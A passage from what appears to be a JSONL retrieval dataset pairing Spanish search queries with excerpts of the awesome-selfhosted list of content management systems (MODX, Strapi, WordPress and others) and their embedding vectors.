conexiΓ³n a internet?", "v": [-0.07309, 0.14759, -0.17118, -0.15289, 0.00095, -0.07374, -0.06562, -0.06977, -0.18929, -0.10585, -0.04452, -0.07376, 0.0538, -0.00479, 0.08184, 0.06987, 0.07523, -0.10002, 0.03736, -0.06963, -0.08574, -0.03509, -0.0159, -0.07274, -0.04292, -0.05035, 0.07199, -0.06161, -0.07798, -0.03882, -0.00763, 0.00118, 0.05528, 0.11885, -0.03889, -0.11723, -0.02421, 0.19935, 0.07091, -0.0589, -0.04239, -0.01731, -0.04675, 0.05132, 0.00924, 0.01475, 0.06546, -0.1314, 0.07604, 0.04855, -0.05275, -0.03103, -0.13366, -0.00674, -0.06369, -0.03492, 0.11867, -0.12335, 0.18058, -0.01479, -0.06371, 0.01887, 0.0242, 0.01076, -0.03977, 0.05412, 0.02163, 0.083, -0.06845, 0.16151, 0.05798, -0.00536, -0.04226, -0.04587, 0.08835, 0.06166, 0.04027, 0.00843, -0.06178, 0.03256, 0.08068, -0.01638, 0.00443, 0.05814, -0.11624, -0.03779, -0.01819, -0.16864, -0.00721, -0.07614, 0.04152, 0.00888, -0.01575, -0.08905, -0.04391, -0.08627, 0.0267, -0.0598, 0.02173, -0.06142, -0.04564, 0.1481, -0.11231, 0.09988, -0.02615, 0.01938, 0.08039, -0.03777, -0.00848, -0.0276, 0.06505, -0.01766, -0.03993, -0.05763, -0.10192, -0.02397, -0.05214, 0.00675, -0.03099, -0.01192, -0.04806, -0.01269, 0.07533, -0.05286, 0.1182, 0.0713, 0.06587, 0.08955, -0.01351, -0.00359, -0.02236, -0.09095, -0.03484, -0.07845, 0.01165, -0.00373, 0.00137, -0.00394, -0.00292, -0.0633, 0.03019, -0.05555, -0.06558, -0.0205, 0.04157, -0.05184, 0.04894, -0.0607, -0.07102, 0.03395, -0.08122, 0.03867, -0.05375, 0.02103, -0.069, 0.04108, -0.01301, 0.00907, -0.0497, 0.07661, -0.03134, -0.03854, 0.01177, 0.05502, -0.05696, 0.04244, -0.11355, 0.07154, 0.00684, 0.00391, -0.05149, 0.08277, 0.00287, -0.10699, 0.01745, -0.01287, -0.12837, -0.00146, 0.04597, -0.01427, -0.07739, -0.08272, 0.00283, 0.04843, -0.04678, 0.00473, 0.00262, -0.05274, -0.07352, 0.06537, 0.01539, -0.0205, -0.03845, 0.07578, 0.08576, -0.05635, -0.06018, 0.00482, 0.04612, -0.00625, -0.05997, -0.0351, 0.03046, -0.00356, -0.02383, 0.01108, 0.01455, -0.02175, 0.01831, 0.02523, -0.00998, -0.0385, 0.03353, -0.08506, -0.00734, 0.0009, 0.06846, -0.0661, -0.05081, 0.01168, 0.02293, 0.01455, -0.00921, 0.03618, 0.05833, 0.04387, 0.02627, -0.00395, 0.02131, -0.02852, -0.01508, -0.05817, -0.02416, -0.04879, -0.03381, -0.08211, 0.01617, 0.01526, -0.09106, 0.01155, -0.05515, 0.06772, 0.03851, -0.01791, 0.04212, -0.06554, -0.08116, -0.00015, -0.01692, -0.06838, -0.05151, -0.01713, 0.01301, -0.0005, -0.00229, 0.01364]} +{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): MODX β€” Advanced content management and publishing platform. The current version is called 'Revolution' [GPL-2.0, PHP]. Neos β€” Neos or TYPO3 Neos (for version 1) is a modern, open source CMS [GPL-3.0, PHP]. Noosfero β€” Platform for social and solidarity economy networks with blog, e-Portfolios, CMS, RSS, thematic discussion, events agenda and collective intelligence for solidarity economy in the same system [AGPL-3.0, Ruby]. Omeka β€” Create complex narratives and share rich collections, adhering to Dublin Core standards with Omeka on your server, designed for scholars, museums, libraries, archives, and enthusiasts [GPL-3.0, PHP]. Payload CMS β€” Developer-first headless CMS and application framework [MIT, Nodejs]. Pimcore β€” Multi-channel experience and engagement management platform [GPL-3.0, PHP/Docker]. Plone β€” Powerful open-source CMS system [ZPL-2.0, Python/Docker]. Publify β€” Simple but full featured web publishing software [MIT, Ruby].", "indexar": "cual es la alternativa gratuita a WordPress para gestionar sitios web modernos?", "v": [-0.01584, 0.03843, -0.11715, -0.11808, -0.03263, 0.03858, -0.0032, -0.14393, -0.1303, -0.11152, -0.04839, -0.14003, 0.08204, -0.03443, 0.08436, -0.06076, 0.13786, -0.04294, 0.06874, -0.05617, -0.07919, -0.06877, 0.00405, -0.047, -0.06042, -0.1337, -0.00278, -0.07065, -0.108, 0.03783, 0.0312, -0.01882, -0.05484, 0.04618, -0.03966, 0.12063, 0.04169, 0.1487, 0.06949, -0.05859, 0.03549, -0.0139, -0.02071, 0.14961, -0.09312, -0.05769, -0.00501, -0.13273, 0.02065, 0.00201, -0.05849, -0.01542, -0.09801, 0.09662, 0.03218, -0.02339, 0.14935, -0.18222, -0.09031, 0.0551, -0.09799, 0.16815, -0.0877, 0.07528, -0.05487, 0.02308, -0.0164, 0.09178, -0.05923, 0.05321, 0.10058, -0.02711, 0.07777, -0.09704, 0.00366, 0.03373, 0.02995, 0.07378, -0.00347, -0.03094, 0.08782, -0.01272, 0.07368, -0.01017, -0.17491, -0.04193, -0.0537, -0.13522, -0.03759, 0.07616, 0.13032, 0.00734, 0.01679, 0.01373, -0.11523, -0.11774, 0.05388, -0.11804, 0.00318, 0.04279, -0.03035, 0.05268, -0.06945, 0.0187, 0.08632, 0.04699, 0.02063, 0.01465, -0.08973, -0.08839, -0.03788, -0.00372, -0.00036, 0.00956, -0.00714, 0.00425, 0.06486, -0.01312, 0.02374, -0.02282, -0.06718, 0.02915, -0.06945, -0.0298, 0.09668, 0.13001, 0.06009, 0.06466, -0.00622, 0.00214, 0.04701, -0.0953, -0.06761, 0.02369, -0.09996, 0.05799, 0.06331, 0.05644, 0.01469, -0.05856, -0.04729, -0.04693, -0.00257, -0.02282, 0.04046, -0.06583, 0.01775, -0.01962, -0.01678, -0.02194, -0.07529, -0.01096, -0.04834, 0.07855, -0.04099, 0.02686, -0.05561, -0.02045, -0.10388, 0.06886, -0.05749, -0.05767, 0.02518, 0.06549, -0.06645, -0.03213, -0.04532, 0.12063, -0.02857, 0.01714, 0.04962, 0.0884, -0.01574, -0.04035, 0.04643, 0.02055, -0.00487, -0.05385, 0.08925, -0.01331, -0.00114, -0.02633, -0.08977, 0.0041, -0.06265, -0.02155, -0.02043, 0.07991, -0.06259, 0.06384, -0.01278, -0.01958, -0.02305, -0.04688, 0.04405, 0.02781, -0.01549, -0.07263, 0.01624, 0.01064, -0.0407, -0.05192, 0.02036, 0.00306, -0.04437, 0.03573, 0.03621, 0.00078, 0.01922, -0.00278, -0.03058, 0.00292, -0.02976, -0.06985, -0.01896, -0.07841, 0.01403, -0.04602, -0.01876, -0.0075, 0.01848, -0.01373, 0.00732, 0.0062, 0.01005, 0.01434, 0.00468, 0.0309, 0.01169, 0.02553, -0.05792, -0.01154, -0.0257, 0.04003, 0.06111, -0.0417, 0.01654, 0.00032, -0.07064, 0.00749, 0.03028, 0.05587, -0.00067, 0.02496, -0.01508, -0.08515, -0.10711, -0.01999, -0.01328, -0.00312, -0.04216, 0.01712, -0.05954, 0.004, 0.00555, 0.0506]} +{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): Pushword β€” Content management system built on Symfony, where pages are Markdown and themes are Twig, with optional Git-based flat-file storage [MIT, PHP]. REDAXO β€” Simple, flexible and useful content management system (documentation in German) [MIT, PHP/Docker]. SilverStripe β€” Easy to use CMS with powerful MVC framework underlying [BSD-3-Clause, PHP]. SPIP β€” Publication system for the Internet aimed at collaborative work, multilingual environments, and simplicity of use for web authors [GPL-3.0, PHP]. Squidex β€” Headless CMS, based on MongoDB, CQRS and Event Sourcing [MIT, .NET]. Strapi β€” The most advanced open-source Content Management Framework (headless-CMS) to build powerful API with no effort [MIT, Nodejs]. Superdesk β€” End-to-end news creation, production, curation, distribution, and publishing platform [⚠, AGPL-3.0, Docker/Python/PHP]. Textpattern β€” Flexible, elegant and easy-to-use CMS [GPL-2.0, PHP]. Typemill β€” Author-friendly flat-file-cms with a visual markdown editor based on vue.js [MIT, PHP].", "indexar": "que cms es bueno para editar con markdown y temas personalizados", "v": [0.04717, 0.02031, -0.0902, -0.01465, -0.0131, -0.05171, -0.11689, 0.05879, -0.06672, -0.12018, -0.04716, -0.03133, -0.02034, -0.11428, -0.03251, -0.00488, 0.06046, 0.00544, 0.137, 0.0976, 0.10938, -0.11525, -0.1974, -0.02832, -0.05501, -0.07079, 0.00533, -0.00729, -0.13451, 0.09191, 0.04066, -0.06678, -0.03576, -0.04018, -0.09446, -0.14167, 0.07607, -0.0406, -0.04006, 0.21745, -0.06618, 0.01408, -0.02866, -0.04574, 0.03945, -0.06157, 0.10903, 0.06991, -0.03094, -0.0855, -0.07409, -0.02827, -0.10241, -0.05687, 0.03249, -0.02846, 0.0769, -0.02604, 0.00405, 0.01667, -0.09008, 0.06016, 0.00343, -0.01462, 0.10262, -0.03839, -0.02916, -0.06869, 0.1185, 0.21149, 0.0456, -0.0553, 0.07287, -0.08249, 0.11589, 0.05744, 0.00167, 0.05441, 0.08363, 0.02384, -0.08584, -0.00797, -0.01469, 0.10041, -0.11911, -0.02482, -0.05208, 0.01005, -0.16384, 0.02127, 0.02851, -0.04675, -0.02216, -0.13179, -0.19777, 0.02271, -0.01094, -0.00442, -0.00572, 0.02648, 0.06017, -0.04832, -0.01505, -0.00206, 0.04261, -0.02479, 0.06378, -0.0589, 0.06775, 0.18378, 0.06593, 0.13886, 0.01805, 0.04392, -0.02695, -0.06444, -0.02211, 0.05401, 0.07569, 0.01096, -0.05173, -0.01245, -0.06029, 0.02319, 0.0456, 0.03434, -0.00329, -0.0196, -0.0598, 0.07537, 0.00791, 0.02236, -0.03843, -0.03501, -0.04328, 0.06829, 0.0115, -0.0574, -0.07307, -0.05973, -0.05907, 0.02349, -0.01919, 0.0204, 0.06565, 0.02361, -0.06103, -0.04012, -0.04941, 0.10241, 0.12764, 0.02943, 0.08389, 0.00964, -0.03826, -0.01281, -0.01776, 0.01914, 0.08545, 0.03517, -0.10401, -0.05144, 0.00905, -0.068, 0.03545, -0.01688, 0.03795, 0.03948, 0.01815, 0.01253, 0.02777, 0.00691, 0.02833, -0.03629, 0.07536, -0.03412, -0.02934, -0.03394, -0.01667, -0.03758, -0.05355, -0.03021, 0.09017, 0.04378, -0.04308, -0.1424, 0.0113, 0.03478, 0.07186, -0.06622, -0.0648, 0.02131, 0.06189, 0.00951, -0.00745, 0.08901, 0.01708, -0.00177, -0.09305, 0.07024, -0.02458, 0.05638, 0.07216, -0.01714, 0.00034, -0.00978, -0.02164, 0.02634, 0.10034, -0.04952, -0.05086, -0.01591, -0.06342, -0.00627, -0.01781, 0.05234, -0.05179, -0.01536, -0.00488, -0.01387, 0.01015, 0.00331, 0.03675, -0.02034, 0.00337, 0.04199, -0.00333, -0.0338, -0.03394, -0.00792, 0.04045, -0.03047, -0.02486, 0.00317, 0.01066, 0.01121, -0.00842, -0.02577, -0.04701, -0.01648, -0.03238, 0.01155, 0.04797, 0.01613, -0.0303, -0.00818, -0.02506, -0.01072, -0.09553, 0.01061, 0.00934, -0.03233, -0.0386, -0.02025, -0.04692, -0.02339]} +{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): Pushword β€” Content management system built on Symfony, where pages are Markdown and themes are Twig, with optional Git-based flat-file storage [MIT, PHP]. REDAXO β€” Simple, flexible and useful content management system (documentation in German) [MIT, PHP/Docker]. SilverStripe β€” Easy to use CMS with powerful MVC framework underlying [BSD-3-Clause, PHP]. SPIP β€” Publication system for the Internet aimed at collaborative work, multilingual environments, and simplicity of use for web authors [GPL-3.0, PHP]. Squidex β€” Headless CMS, based on MongoDB, CQRS and Event Sourcing [MIT, .NET]. Strapi β€” The most advanced open-source Content Management Framework (headless-CMS) to build powerful API with no effort [MIT, Nodejs]. Superdesk β€” End-to-end news creation, production, curation, distribution, and publishing platform [⚠, AGPL-3.0, Docker/Python/PHP]. Textpattern β€” Flexible, elegant and easy-to-use CMS [GPL-2.0, PHP]. Typemill β€” Author-friendly flat-file-cms with a visual markdown editor based on vue.js [MIT, PHP].", "indexar": "cual es una alternativa libre al wordpress que use php y docker", "v": [0.13566, -0.01201, -0.07839, 0.02068, -0.04551, -0.0561, 0.0568, -0.03839, -0.0501, -0.14012, -0.13225, -0.19643, -0.07168, -0.16092, 0.00319, -0.17958, 0.09543, -0.09063, 0.07424, 0.02201, -0.08869, 0.01868, -0.10396, -0.11026, -0.02053, -0.07483, -0.06658, -0.0366, -0.1604, -0.02676, 0.02128, -0.05997, -0.04411, 0.0283, -0.02791, 0.01507, 0.10627, 0.04256, 0.08647, 0.03635, -0.01319, -0.01303, -0.12293, 0.15065, -0.09726, 0.04895, -0.04541, -0.12422, 0.07826, 0.03434, -0.05963, 0.00994, -0.06531, 0.12406, -0.00295, 0.05263, 0.12058, -0.20099, 0.01655, 0.0482, -0.14622, 0.09022, -0.05598, -0.10622, 0.01002, -0.0389, 0.00337, 0.07194, -0.06788, 0.18228, 0.02731, 0.10112, 0.05203, -0.03712, -0.04164, 0.05525, 0.00263, 0.05105, -0.04028, 0.00561, 0.01026, -0.10611, -0.04068, 0.11625, -0.03172, -0.10202, 0.10297, -0.07175, 0.06713, 0.03399, 0.06936, 0.05973, -0.031, 0.11589, 0.01167, -0.13879, -0.03822, 0.06484, -0.02581, -0.02328, 0.03981, 0.04309, -0.01269, -0.0269, 0.07694, 0.00322, 0.03216, 0.01655, -0.05448, -0.06896, -0.01945, 0.03515, 0.045, -0.01299, -0.0372, -0.02954, -0.03084, 0.05938, -0.00983, -0.03029, 0.05429, -0.05451, -0.07241, -0.07508, 0.1055, 0.02374, 0.10161, 0.06012, -0.04463, 0.03486, 0.07432, -0.06987, -0.13889, -0.08654, -0.08189, 0.0362, 0.05092, -0.06756, 0.01023, -0.02848, -0.06335, -0.02726, 0.06654, -0.01866, 0.02642, 0.02171, -0.00067, -0.08514, -0.00313, -0.02333, -0.02862, 0.04747, 0.01351, 0.0458, -0.14302, 0.00036, -0.02448, -0.01029, -0.05284, 0.11777, 0.01529, -0.03897, -0.00817, -0.00681, -0.0328, -0.02985, 0.04879, -0.07779, -0.04457, 0.01737, 0.00935, 0.03498, 0.03705, -0.06044, 0.04243, -0.07007, 0.02948, -0.08987, 0.01439, -0.03317, 0.05867, -0.0035, -0.00731, 0.00902, 0.03104, -0.05154, -0.0168, 0.04894, 0.04108, 0.06279, -0.06907, 0.04831, 0.01147, -0.10086, -0.00931, -0.03853, 0.00192, -0.06809, 0.01928, 0.0383, -0.03197, 0.00639, -0.02227, 0.00038, -0.03405, 0.02658, -0.03428, 0.04437, 0.02811, -0.01439, 0.02481, -0.01071, 0.02437, -0.02459, -0.0621, -0.03641, 0.04758, -0.03861, -0.00118, -0.05239, -0.00151, 0.029, 0.04451, -0.00686, 0.01569, 0.01769, -0.01253, -0.00628, -0.02479, 0.00621, -0.02503, -0.02466, -0.01187, 0.01409, 0.01308, -0.02707, 0.00916, -0.00672, 0.02805, -0.04915, 0.02694, 0.02443, -0.00695, -0.04329, 0.01172, 0.0231, -0.0954, -0.02656, -0.01648, -0.01075, -0.02881, 0.02826, 0.00422, -0.03146, -0.04632, 0.03289]} +{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): Pushword β€” Content management system built on Symfony, where pages are Markdown and themes are Twig, with optional Git-based flat-file storage [MIT, PHP]. REDAXO β€” Simple, flexible and useful content management system (documentation in German) [MIT, PHP/Docker]. SilverStripe β€” Easy to use CMS with powerful MVC framework underlying [BSD-3-Clause, PHP]. SPIP β€” Publication system for the Internet aimed at collaborative work, multilingual environments, and simplicity of use for web authors [GPL-3.0, PHP]. Squidex β€” Headless CMS, based on MongoDB, CQRS and Event Sourcing [MIT, .NET]. Strapi β€” The most advanced open-source Content Management Framework (headless-CMS) to build powerful API with no effort [MIT, Nodejs]. Superdesk β€” End-to-end news creation, production, curation, distribution, and publishing platform [⚠, AGPL-3.0, Docker/Python/PHP]. Textpattern β€” Flexible, elegant and easy-to-use CMS [GPL-2.0, PHP]. Typemill β€” Author-friendly flat-file-cms with a visual markdown editor based on vue.js [MIT, PHP].", "indexar": "con que puedo montar un sistema de redaccion de noticias distribuida", "v": [0.15433, 0.04598, -0.12007, -0.13601, 0.00801, 0.03232, -0.00072, -0.01607, -0.21375, -0.11682, -0.08254, -0.14375, 0.04113, -0.17262, 0.01216, -0.01327, 0.06397, -0.04401, 0.05391, -0.09902, 0.01973, -0.11437, 0.0227, -0.07089, 0.04182, -0.02045, 0.03481, -0.05861, -0.13645, 0.04262, -0.02445, 0.03185, 0.05445, 0.04928, -0.08633, 0.07496, 0.03762, 0.05616, 0.03589, -0.11172, -0.0651, -0.07071, -0.00396, -0.12712, 0.0113, -0.01591, -0.0123, -0.18082, -0.0281, -0.04324, 0.0631, 0.00526, -0.08648, -0.06169, -0.02363, -0.09733, 0.09748, 0.0358, 0.01456, 0.02507, 0.07719, 0.15027, -0.0797, -0.02145, -0.00714, 0.02492, -0.06587, -0.10767, -0.13551, 0.10539, 0.06993, -0.08839, 0.12148, 0.0886, -0.1463, 0.03949, -0.01158, -0.03454, -0.01406, 0.11577, 0.04149, 0.02169, 0.0065, 0.08985, 0.05313, -0.08285, 0.0651, -0.03922, -0.07188, -0.03155, -0.02766, -0.04536, 0.03409, 0.021, 0.06729, -0.08195, 0.05168, 0.00219, -0.07388, -0.02804, -0.1121, -0.02294, -0.0078, 0.09458, -0.00577, -0.08021, 0.01606, -0.01166, 0.15609, -0.07715, 0.07967, 0.03633, -0.09276, 0.03684, -0.1476, -0.01755, -0.01473, 0.09731, -0.04147, -0.02605, 0.03594, 0.12833, 0.05272, 0.0225, 0.12002, -0.02175, 0.05558, 0.07578, -0.05453, 0.00903, 0.04504, -0.00897, 0.0264, 0.04072, -0.02705, -0.01474, -0.03987, 0.03712, -0.03814, -0.05062, -0.04908, 0.00351, -0.02305, -0.08414, 0.04517, 0.00921, 0.06072, -0.0835, -0.00153, -0.04819, -0.00889, 0.07484, 0.06562, -0.09393, -0.02384, -0.00605, 0.11843, -0.01242, 0.01578, 0.05139, -0.01294, 0.02177, 0.00821, 0.03242, -0.01989, 0.00749, -0.00175, -0.02747, 0.06498, -0.02685, -0.02324, 0.05996, 0.05141, 0.00287, 0.01995, 0.02572, -0.09072, -0.04291, 0.01867, 0.07052, 0.00072, 0.00524, -0.05423, 0.02532, 0.01016, 0.04505, -0.02458, 0.05785, -0.04777, -0.00786, 0.11077, 0.03388, 0.00606, 0.03055, 0.05004, 0.02042, -0.0101, -0.02957, 0.03388, 0.06177, -0.05271, 0.08259, 0.10255, -0.04618, -0.01338, -0.04329, 0.04183, 0.07455, 0.0879, 0.04581, 0.08544, 0.03548, -0.0252, -0.03353, -0.06694, 0.0214, 0.04062, -0.01308, 0.02793, -0.02072, 0.06648, -0.03772, 0.02896, 0.03448, 0.01303, -0.00521, -0.0452, 0.00405, 0.05053, 0.0036, -0.03621, 0.00417, 0.04016, 0.00714, -0.02231, -0.04339, 0.01197, 0.0584, -0.02421, -0.05436, 0.04002, 0.06713, 0.04418, 0.00455, -0.02065, -0.05261, -0.03265, -0.01234, -0.03078, -0.08027, -0.00609, 0.00306, 0.00057, -0.06022, -0.00812, -0.02213]} +{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): TYPO3 β€” Powerful and advanced CMS with a large community [GPL-2.0, PHP]. Umbraco β€” The friendly CMS. Free and open source with an amazing community [MIT, .NET]. Vvveb CMS β€” Powerful and easy to use CMS to build websites, blogs or e-commerce stores [AGPL-3.0, PHP/Docker]. Wagtail β€” Django content management system focused on flexibility and user experience [BSD-3-Clause, Python]. WinterCMS β€” Speedy and secure content management system built on the Laravel PHP framework [MIT, PHP]. WonderCMS β€” WonderCMS is the smallest flat file CMS since 2008 [MIT, PHP]. WordPress β€” World's most-used blogging and CMS engine [GPL-2.0, PHP].", "indexar": "cuΓ‘l es el gestor de contenidos mΓ‘s fΓ‘cil para principiantes?", "v": [0.03757, 0.08951, 0.00738, -0.0294, 0.10451, -0.02064, -0.04016, -0.06275, -0.1487, -0.15078, -0.0071, 0.09942, -0.07191, 0.00501, 0.09822, 0.04132, 0.0268, -0.12323, -0.04296, 0.09952, -0.00453, -0.00528, 0.09656, -0.06059, -0.07492, -0.07799, 0.12204, -0.08009, -0.03505, 0.04365, -0.02737, -0.05061, -0.01865, -0.03748, -0.04651, 0.01897, -0.02866, 0.10252, -0.08175, 0.0318, -0.01361, -0.06296, -0.03753, 0.06422, 0.07325, -0.06826, 0.03114, -0.06242, 0.0676, -0.03606, 0.01583, -0.07247, 0.00328, -0.03579, -0.07821, -0.08903, 0.11131, -0.09798, 0.12654, -0.14349, 0.06155, 0.06803, -0.0032, 0.12675, -0.09116, -0.06766, 0.06036, 0.1646, -0.05035, 0.05801, 0.03101, -0.02331, 0.0035, 0.02569, 0.06884, 0.08649, 0.01629, 0.0536, -0.00627, 0.00829, 0.1268, -0.08511, -0.01374, 0.02855, -0.08806, -0.01504, -0.0441, -0.1642, -0.00756, -0.14154, 0.01641, -0.03665, 0.08277, -0.00968, -0.15092, -0.04964, 0.06321, -0.01449, -0.04316, 0.03549, 0.00242, 0.00513, -0.02992, 0.15171, 0.03199, 0.08626, 0.02675, -0.03536, -0.08412, -0.02744, -0.02978, 0.03557, -0.07119, 0.0015, -0.04734, 0.06373, -0.0772, 0.00201, 0.03688, -0.02836, -0.00365, -0.07125, -0.02222, 0.06105, 0.12783, 0.05441, 0.12625, 0.07687, 0.06105, 0.04107, -0.00791, -0.04989, -0.02689, 0.0911, -0.07535, 0.03862, -0.02655, -0.00532, -0.01073, -0.04833, -0.07673, -0.06541, 0.01389, -0.00184, 0.08618, -0.08487, 0.11721, -0.03659, -0.00027, 0.13151, -0.05195, -0.05662, 0.00335, 0.02535, 0.01698, 0.02316, -0.06234, -0.08494, -0.0348, 0.01832, -0.02661, -0.03136, -0.01581, -0.07762, -0.06074, -0.07805, -0.09553, 0.02507, -0.0006, -0.00109, 0.00463, 0.0738, 0.04838, -0.06372, 0.01554, -0.07081, -0.04222, -0.1311, -0.00531, -0.01434, -0.04613, -0.03157, -0.03925, 0.17729, -0.02125, -0.07697, -0.00612, 0.07418, -0.0381, 0.07932, 0.02075, 0.02163, -0.07751, -0.10004, 0.09062, -0.06321, -0.05187, -0.06615, -0.05005, 0.00997, -0.01763, -0.01811, -0.03467, 0.01734, 4e-05, 0.01101, -0.04698, -0.03921, 0.00075, 0.03762, 0.01038, -0.02441, 0.00954, -0.01595, 0.0304, -0.02463, 0.047, -0.00026, 0.01822, 0.0085, 0.05152, 0.01278, -0.01439, -0.04139, -0.00495, 0.01373, 0.0298, -0.04461, -0.00372, 0.0541, -0.07457, -0.0198, 0.02013, -0.01856, 0.04133, -0.02992, 0.09555, 0.0115, -0.06655, -0.02846, 0.0203, 0.08587, 0.02416, 0.00168, -0.09348, -0.00472, -0.03286, 0.02872, -0.08949, -0.06889, -0.00701, -0.06103, 0.10232, -0.01426, -0.04032, -0.03912]} +{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): TYPO3 β€” Powerful and advanced CMS with a large community [GPL-2.0, PHP]. Umbraco β€” The friendly CMS. Free and open source with an amazing community [MIT, .NET]. Vvveb CMS β€” Powerful and easy to use CMS to build websites, blogs or e-commerce stores [AGPL-3.0, PHP/Docker]. Wagtail β€” Django content management system focused on flexibility and user experience [BSD-3-Clause, Python]. WinterCMS β€” Speedy and secure content management system built on the Laravel PHP framework [MIT, PHP]. WonderCMS β€” WonderCMS is the smallest flat file CMS since 2008 [MIT, PHP]. WordPress β€” World's most-used blogging and CMS engine [GPL-2.0, PHP].", "indexar": "quΓ© alternativa libre a WordPress hay si uso .NET?", "v": [-0.08161, 0.012, -0.12748, -0.08232, -0.07009, 0.05258, -0.08549, -0.18189, -0.07049, -0.12412, -0.12501, -0.13825, -0.00126, -0.00189, 0.06706, -0.0753, 0.0528, -0.05337, 0.12306, -0.0348, -0.13557, -0.07214, -0.06909, -0.0988, 0.00302, -0.00731, -0.02672, 0.05388, -0.06588, 0.05117, -0.05234, 0.00569, -0.0804, 0.09169, -0.09479, 0.1308, 0.08143, 0.111, 0.16579, -0.07159, 0.06034, 0.01466, -0.01846, 0.22169, -0.11542, 0.00031, -0.02036, -0.11457, 0.0167, 0.02956, -0.01251, -0.03828, -0.06848, 0.15433, 0.04817, -0.00268, 0.11167, -0.14117, -0.09581, 0.05031, -0.13288, 0.08307, -0.05474, 0.01122, -0.03862, 0.00496, -0.01964, 0.07501, -0.01942, 0.14818, 0.11035, -0.06593, 0.01287, -0.11693, -0.08806, 0.08196, -0.03106, 0.05184, 0.00352, -0.05607, 0.04607, -0.06065, 0.02985, -0.01582, -0.14556, -0.05632, 0.0851, -0.10127, -0.04653, 0.10854, 0.12512, 0.07708, -0.01412, 0.04575, -0.05785, -0.10755, -0.02266, -0.05533, 0.0152, 0.05354, 0.03387, 0.07337, -0.0002, -0.02864, 0.09683, -0.00117, 0.05293, 0.01915, -0.09488, -0.10034, 0.00118, 0.07039, 0.00977, 0.00548, -0.01901, -0.02817, 0.05431, -0.00059, -0.01269, -0.00294, -0.00927, 0.05188, -0.02095, -0.08704, 0.1368, 0.10332, 0.04469, 0.10141, -0.0491, 0.00655, 0.0726, -0.06044, -0.10388, 0.03914, -0.10614, 0.0489, 0.07817, -0.00258, -0.00865, -0.01011, 0.02062, -0.07705, -0.01998, -0.01592, 0.03782, -0.01628, 0.00162, -0.03435, -0.0091, -0.05173, -0.02981, -0.04469, -0.02017, 0.07049, -0.05605, 0.03574, -0.00449, -0.00594, -0.08008, 0.06497, -0.04361, -0.05554, 0.02359, 0.06181, -0.05821, -0.02529, -0.00844, 0.03415, -0.04944, -0.00817, 0.0192, 0.08228, 0.04426, -0.05506, 0.06716, -0.01081, -0.00486, -0.02907, 0.01992, -0.03813, -0.01378, -0.01099, -0.08601, 0.01522, -0.02875, -0.00834, -0.01901, 0.05946, -0.03931, 0.06644, -0.09737, 0.03824, 0.01235, -0.06263, -0.00284, 0.02693, -0.02452, -0.05336, 0.02518, 0.00651, -0.0514, -0.01949, 0.02729, 0.02723, 0.02466, -0.00821, 0.00335, -0.01417, 0.05176, 0.04554, 0.00744, -0.03029, -0.00483, 0.04274, -0.02631, -0.02543, 0.01094, 0.00679, 0.00261, -0.0186, 0.02402, 0.02805, -0.02325, 0.03085, 0.02275, 0.04678, -0.01911, -0.00422, 0.01784, 0.0498, -0.01511, -0.03859, -0.01309, 0.02919, -0.03408, -0.10057, 0.00644, 0.01276, -0.0223, 0.00125, 0.0169, 0.06059, -0.04738, -0.0105, -0.00975, -0.03933, -0.0634, -0.01758, -0.02713, -0.01091, -0.02178, 0.03097, -0.03191, 0.0039, -0.04525, 0.06205]} +{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): TYPO3 β€” Powerful and advanced CMS with a large community [GPL-2.0, PHP]. Umbraco β€” The friendly CMS. Free and open source with an amazing community [MIT, .NET]. Vvveb CMS β€” Powerful and easy to use CMS to build websites, blogs or e-commerce stores [AGPL-3.0, PHP/Docker]. Wagtail β€” Django content management system focused on flexibility and user experience [BSD-3-Clause, Python]. WinterCMS β€” Speedy and secure content management system built on the Laravel PHP framework [MIT, PHP]. WonderCMS β€” WonderCMS is the smallest flat file CMS since 2008 [MIT, PHP]. WordPress β€” World's most-used blogging and CMS engine [GPL-2.0, PHP].", "indexar": "con quΓ© programa puedo montar un blog rΓ‘pido y seguro?", "v": [-0.04364, 0.10798, -0.15818, -0.05459, -0.14841, -0.06448, -0.04321, -0.00478, -0.17745, -0.16847, -0.04127, -0.03815, 0.07801, -0.02477, 0.03108, 0.05634, 0.0614, -0.08432, 0.09545, 0.06363, 0.05918, -0.07601, -0.0721, -0.14618, 0.03596, -0.03338, 0.03447, 0.0525, -0.07612, 0.05285, 0.01654, 0.09064, 0.08375, 0.01906, -0.06769, 0.01943, 0.13641, 